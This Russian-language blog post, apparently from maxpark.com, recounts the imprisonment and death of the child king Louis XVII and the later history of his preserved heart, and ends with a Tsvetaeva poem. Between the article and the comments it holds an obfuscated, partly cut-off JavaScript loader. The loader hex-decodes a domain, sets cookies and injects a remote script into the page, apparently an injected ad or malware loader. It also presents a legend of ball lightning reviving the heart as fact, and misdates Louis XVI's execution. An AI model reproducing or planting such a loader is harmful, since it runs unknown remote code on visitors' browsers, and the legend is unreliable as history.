Сердце юного короля
Людовик XVI был одним из "приличных" королей Франции последней четверти XVIII века. Он был образцовым католиком, нежным мужем и отцом, но лихая ему досталась доля. Он оказался не в том месте и не в то время, когда можно быть счастливым.
Грянувшая Великая по пролитой крови французская революция отправила короля и его жену Марию Антуанетту на гильотину. Ниже речь пойдёт о Людовике Карле (Луи-Шарль), который с рождения носил титул герцога Нормандского, а после смерти старшего брата в 1789 г. четырехлетний Луи-Шарль стал наследником престола и получил титул дофина. В 1791 году, когда Людовик XVI стал конституционным «королём французов», титул сына был изменён на «Королевский принц Франции» фр. Prince Royal de France.

Дофин Луи-Шарль. Портрет работы Александра Кушарского. (1792 год).
10 августа 1792 года монархия во Франции была отменена, и всё королевское семейство — ставшее, по имени их предка Гуго Капета, просто «гражданами Капетами» — было заточено в Тампле.
Дальше королевской семье не позавидуешь. Узнав о казни Людовика XVI 22 января 1793 г., Мария-Антуанетта встала на колени перед сыном и присягнула ему как своему королю. Через неделю, 28 января 1793, дядя мальчика, граф Прованский, находившийся в эмиграции в Германии, издал декларацию, в которой провозгласил племянника королём Людовиком XVII. К этой декларации присоединилось большинство королевских домов Европы, а также республиканское правительство США, не признавшее французской революции.
Не решившись умертвить опасного им ребёнка физически, якобинцы, возглавлявшие в то время революционное правительство, пожелали воспитать его истинным санкюлотом и использовать в своих целях. (Санкюлоты - мелкие буржуа, ремесленники), носившие длинные брюки вместо аристократических коротких штанов до колен - culott).
Эти либералы опозорили революцию уже тем, что стремились добиться от Луи-Шарля Капета показаний против собственной матери — среди многочисленных обвинений, выдвинутых против Марии-Антуанетты, было надуманное кровосмесительное сожительство с собственным сыном. 16 октября 1793 года "вдова Капет" была казнена.
После казни матери Национальный Конвент поручил «революционное воспитание» дофина сапожнику Анри Симону (1736-1794) и его жене, которые поселились в Тампле. Их задачей было заставить Людовика отречься от памяти родителей (в частности, научить его оскорблять их память) и принять революционные идеалы. Симон и его жена нередко били мальчика за разные провинности. 8-летнему мальчику часто угрожали смертью на гильотине, доводя его до обмороков на нервной почве. Когда юный король «пел революционные песни» и (с чужих слов) нещадно ругал прежний строй, ему дарили игрушки.
Оставшись без жалованья, сапожник с женой покидают Тампль. По приказу начальника тюрьмы наследника престола бросили в ту же камеру-одиночку, где до казни находился его отец. Все окна в его камере заделали наглухо, дверь до половины замуровали, а верхнюю часть закрыли мощной решеткой с крохотным окошком для передачи пищи. В Тампле этажом ниже находилась и сестра дофина, 16-летняя Мария-Тереза.
После свержения кровавого маньяка Робеспьера (июль 1794 года; среди объявленных вместе с Робеспьером вне закона и казнённых был и сапожник Анри Симон) Поль де Баррас, лидер Национального конвента, сыгравший немалую роль в прекращении кровавого террора и казни его инициатора, первым делом отправился в Тампль проведать Луи-Шарля и Марию-Терезу. Дофин выглядел ужасающе: суставы сильно распухли и он едва мог передвигаться. Мальчик надрывно кашлял, его кровать кишела насекомыми, в камере было нечем дышать. У него была тежёлая форма туберкулёза. Несмотря на все старания, юного короля уже нельзя было спасти и 18 июня 1795 г. он скончался.
Доктор, производивший вскрытие, выкрал сердце принца и сохранил его в сосуде со спиртом для дальнейшего изучения. Тело Луи-Шарля Капета было тайно погребено в общей могиле.
Граф Прованский, узнав за границей о смерти десятилетнего племянника, провозгласил себя королём Людовиком XVIII. Под этим именем он занял французский престол в 1814 году де-факто, но отсчитывал начало правления с 1795 года. А далее начинаются детективные истории.
Слухи о том, что тело ребёнка, вскрытое в Тампле в 1795 году, не принадлежало дофину, начали ходить по Парижу уже в то же время. Его сестра Мария Терезия, герцогиня Ангулемская, до конца дней так и не была уверена в том, что её брат умер. Один лишь доктор-хирург, обладая сердцем юного короля, был в этом уверен. Но никому не мог об этом сказать. А следовало, поскольку появились самозванцы. Если в России в Смутное время "официальных" было четыре Лжедмитрия, то во Франции несчастный Луи-Шарль «воскресал» не менее 40 раз… От неутомимых мошенников досталось и Луи-Филиппу, который правил Францией с 1830 по 1848 г.
Однажды дождливым вечером врач-хирург Филипп-Жан Пелетан сидел у камина и размылял над тем, чем же сердце короля отличается от сердца простолюдина.
В это время в комнату влетела шаровая молния величиной с апельсин и такого же цвета. Она проплыла мимо замершего доктора в одном метре от него, ударилась в железный шкаф и с шипением распалась. Доктор подскочил к шкафу и открыл дверцу. На полках стояли сосуды с сердцами и другими человеческими органами. Доктор не поверил своим глазам, один из сосудов слегка светился бледно голубым цветом, а внутри его пульсировало сердце.
Биение продолжалось около 20 секунд. Спирт приобрёл красный оттенок. Когда свечение сосуда прекратилось, сердце юного короля в последний раз встрепенулось и замерло. Поражённый видом этого чуда, доктор стоял неподвижно несколько минут. Затем плюхнулся в кресло и задумался. На соседние сосуды с сердцами обычных людей молния не оказала никакого воздействия. Это знак свыше или случайное совпадение?
Не зная, что и подумать, доктор сел за стол и подробно всё записал в медицинский журнал наблюдений. Шло время. Сердце Людовика XVII, который и дня не правил, досталось потомкам врача, а затем переходило от одного европейского аристократа к другому.

Сосуд с сердцем Людовика XVII.Аббатство Сен-Дени.
А тем временем несколько Лжелюдовиков явилось и в Америке; Марк Твен высмеял их в образе Короля, персонажа романа «Приключения Гекльберри Финна». Появились уже и потомки Лжелюдовиков, претендующие на свой кусок королевского величия. Попытки установить точное место захоронения дофина и идентифицировать его останки, предпринимавшиеся в XIX и XX веке, не увенчались успехом. Вопросу установления личности Людовика XVII посвящён детективный роман американского писателя Луи Байяра «Чёрная башня».
В 1975 г. драгоценная реликвия перешла в руки герцога Бофремона, главы легитимистов Франции, который поместил ее в склеп собора Сен-Дени. Немецкий и бельгийский профессора независимо друг от друга провели анализ ДНК сердца юного короля. Затем аналогичной процедуре подвергли образцы волос Марии-Антуанетты и двух ее сестер, принадлежавших австрийской династии Габсбургов. Результаты экспертизы послужили доказательством того, что Луи-Шарль действительно умер в Тампле в 1795 году.Наконец, 8 июня 2004 года сосуд с сердцем невинной жертвы Великой французской революции торжественно в присутствии представителей всех королевских домов Европы был погребен в базилике Сен-Дени под Парижем, усыпальнице французских монархов. Сосуд поместили в гроб, покрытый синим знаменем с золотым изображением королевских лилий. А учёные до сих пор ломают головы по поводу записи оживления сердца десятилетнего короля Людовика XVII. Уж не приснилось ли это видение доктору?

Надгробие Людовика XVII и сосуд с его сердцем. Аббатство Сен-Дени.
Людовик XVII вошёл в историю как невинная жертва французской революции. А сколько таких было жертв, оставшихся безымянными в истории! (Составлено по материалам из Интернета, включая Википедию)
<script type="text/javascript">// </script>
<script type="text/javascript">// </script>
<script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Комментарии
Отцам из роз венец, тебе из терний,
Отцам — вино, тебе — пустой графин.
За их грехи ты жертвой пал вечерней,
О на заре замученный дофин!
Не сгнивший плод — цветок неживше-свежий
Втоптала в грязь народная гроза.
У всех детей глаза одни и те же:
Невыразимо-нежные глаза!
Наследный принц, ты стал курить из трубки,
В твоих кудрях мятежников колпак,
Вином сквернили розовые губки,
Дофина бил сапожника кулак. (Марина Цветаева)